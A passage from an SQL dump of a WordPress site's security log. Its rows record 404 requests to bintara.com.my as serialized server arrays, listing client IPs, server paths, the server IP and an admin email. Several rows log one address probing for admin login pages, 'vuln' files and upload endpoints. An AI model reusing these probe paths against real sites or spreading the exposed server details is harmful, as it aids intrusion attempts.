deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:110:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"163.172.105.148\";s:11:\"REMOTE_PORT\";s:5:\"57004\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaB3vdhhRUPPrMQqLsRe4AAAAQM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1570797501.974\";s:12:\"REQUEST_TIME\";s:10:\"1570797501\";}}','notice','2019-10-11 12:38:24','2019-10-11 12:38:22',35422672,37239352,'https://bintara.com.my/?page_id=18',1,0,'163.172.105.148'),(27913,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"316\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:70:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.4639; Pro)\";s:21:\"HTTP_X_FEATUREVERSION\";s:1:\"1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:29:\"HTTP_X_MS_COOKIEURI_REQUESTED\";s:1:\"t\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:21:\"HTTP_X_OFFICE_VERSION\";s:9:\"16.0.4639\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaCAsdhhRUPPrMQqLsRgkAAAAQE\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:13:\"49.50.237.136\";s:11:\"REMOTE_PORT\";s:5:\"57379\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaCAsdhhRUPPrMQqLsRgkAAAAQE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1570799793.836\";s:12:\"REQUEST_TIME\";s:10:\"1570799793\";}}','notice','2019-10-11 13:16:36','2019-10-11 13:16:34',35832824,37626088,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'49.50.237.136'),(27914,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:25:\"/blog/tag/logitech-rally/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:47:\"https://bintara.com.my/blog/tag/logitech-rally/\";s:19:\"REDIRECT_SCRIPT_URL\";s:25:\"/blog/tag/logitech-rally/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaCH5G8ZiIu6tWuksp6AIgAAAMw\";s:12:\"REDIRECT_URL\";s:25:\"/blog/tag/logitech-rally/\";s:11:\"REMOTE_ADDR\";s:13:\"40.77.167.215\";s:11:\"REMOTE_PORT\";s:4:\"7850\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:47:\"https://bintara.com.my/blog/tag/logitech-rally/\";s:10:\"SCRIPT_URL\";s:25:\"/blog/tag/logitech-rally/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaCH5G8ZiIu6tWuksp6AIgAAAMw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570801636.5605\";s:12:\"REQUEST_TIME\";s:10:\"1570801636\";}}','notice','2019-10-11 13:47:18','2019-10-11 13:47:16',33921688,35731696,'https://bintara.com.my/blog/tag/logitech-rally/',1,0,'40.77.167.215'),(27915,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:8:\"/22.html\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:10:\"HTTP_RANGE\";s:14:\"bytes=0-524287\";s:15:\"HTTP_USER_AGENT\";s:73:\"facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:30:\"https://bintara.com.my/22.html\";s:19:\"REDIRECT_SCRIPT_URL\";s:8:\"/22.html\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaCnAG8ZiIu6tWuksp6G9gAAAME\";s:12:\"REDIRECT_URL\";s:8:\"/22.html\";s:11:\"REMOTE_ADDR\";s:13:\"66.220.149.28\";s:11:\"REMOTE_PORT\";s:5:\"39568\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:30:\"https://bintara.com.my/22.html\";s:10:\"SCRIPT_URL\";s:8:\"/22.html\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaCnAG8ZiIu6tWuksp6G9gAAAME\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570809600.6599\";s:12:\"REQUEST_TIME\";s:10:\"1570809600\";}}','notice','2019-10-11 16:00:05','2019-10-11 16:00:01',35412008,35769840,'https://bintara.com.my/22.html',1,0,'66.220.149.28'),(27916,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:55:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/admin/login.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:78:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/admin/login.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:16:\"/admin/login.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaDG97tTKIeEpI47WDpLHgAAAI8\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/admin/login.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:16:\"/admin/login.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaDG97tTKIeEpI47WDpLHgAAAI8\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/admin/login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/admin/login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaDG97tTKIeEpI47WDpLHgAAAI8\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"192.99.15.141\";s:11:\"REMOTE_PORT\";s:5:\"57043\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/admin/login.php\";s:10:\"SCRIPT_URL\";s:16:\"/admin/login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaDG97tTKIeEpI47WDpLHgAAAI8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570817783.3113\";s:12:\"REQUEST_TIME\";s:10:\"1570817783\";}}','notice','2019-10-11 18:16:25','2019-10-11 18:16:23',35032728,36832904,'https://bintara.com.my/admin/login.php',1,0,'192.99.15.141'),(27917,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/wp-content/vuln.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:78:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/wp-content/vuln.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:20:\"/wp-content/vuln.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaDHmV28Is7SvRkXTvgiRwAAAYo\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/wp-content/vuln.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/wp-content/vuln.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaDHmV28Is7SvRkXTvgiRwAAAYo\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"192.99.15.141\";s:11:\"REMOTE_PORT\";s:5:\"55955\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"https://bintara.com.my/wp-content/vuln.php\";s:10:\"SCRIPT_URL\";s:20:\"/wp-content/vuln.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaDHmV28Is7SvRkXTvgiRwAAAYo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570817945.6766\";s:12:\"REQUEST_TIME\";s:10:\"1570817945\";}}','notice','2019-10-11 18:19:07','2019-10-11 18:19:06',35025336,36831448,'https://bintara.com.my/wp-content/vuln.php',1,0,'192.99.15.141'),(27918,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:42:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:9:\"/vuln.htm\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:78:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/vuln.htm\";s:19:\"REDIRECT_SCRIPT_URL\";s:9:\"/vuln.htm\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaDHqLtTKIeEpI47WDpLLQAAAIo\";s:12:\"REDIRECT_URL\";s:9:\"/vuln.htm\";s:11:\"REMOTE_ADDR\";s:13:\"192.99.15.141\";s:11:\"REMOTE_PORT\";s:5:\"55327\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:31:\"https://bintara.com.my/vuln.htm\";s:10:\"SCRIPT_URL\";s:9:\"/vuln.htm\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaDHqLtTKIeEpI47WDpLLQAAAIo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:13:\"1570817960.48\";s:12:\"REQUEST_TIME\";s:10:\"1570817960\";}}','notice','2019-10-11 18:19:22','2019-10-11 18:19:20',35018800,36824680,'https://bintara.com.my/vuln.htm',1,0,'192.99.15.141'),(27919,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:45:\"/wp-content/uploads/2019/10/settings_auto.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:78:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:67:\"https://bintara.com.my/wp-content/uploads/2019/10/settings_auto.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:45:\"/wp-content/uploads/2019/10/settings_auto.php\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaDH3Cs5YWMzYbMc823a9AAAAdU\";s:19:\"REDIRECT_SCRIPT_URI\";s:67:\"https://bintara.com.my/wp-content/uploads/2019/10/settings_auto.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:45:\"/wp-content/uploads/2019/10/settings_auto.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaDH3Cs5YWMzYbMc823a9AAAAdU\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"192.99.15.141\";s:11:\"REMOTE_PORT\";s:5:\"50594\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:67:\"https://bintara.com.my/wp-content/uploads/2019/10/settings_auto.php\";s:10:\"SCRIPT_URL\";s:45:\"/wp-content/uploads/2019/10/settings_auto.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaDH3Cs5YWMzYbMc823a9AAAAdU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570818012.7225\";s:12:\"REQUEST_TIME\";s:10:\"1570818012\";}}','notice','2019-10-11 18:20:14','2019-10-11 18:20:13',35025536,36830512,'https://bintara.com.my/wp-content/uploads/2019/10/settings_auto.php',1,0,'192.99.15.141'),(27920,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:42:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/jm-ajax/upload_file/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:78:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 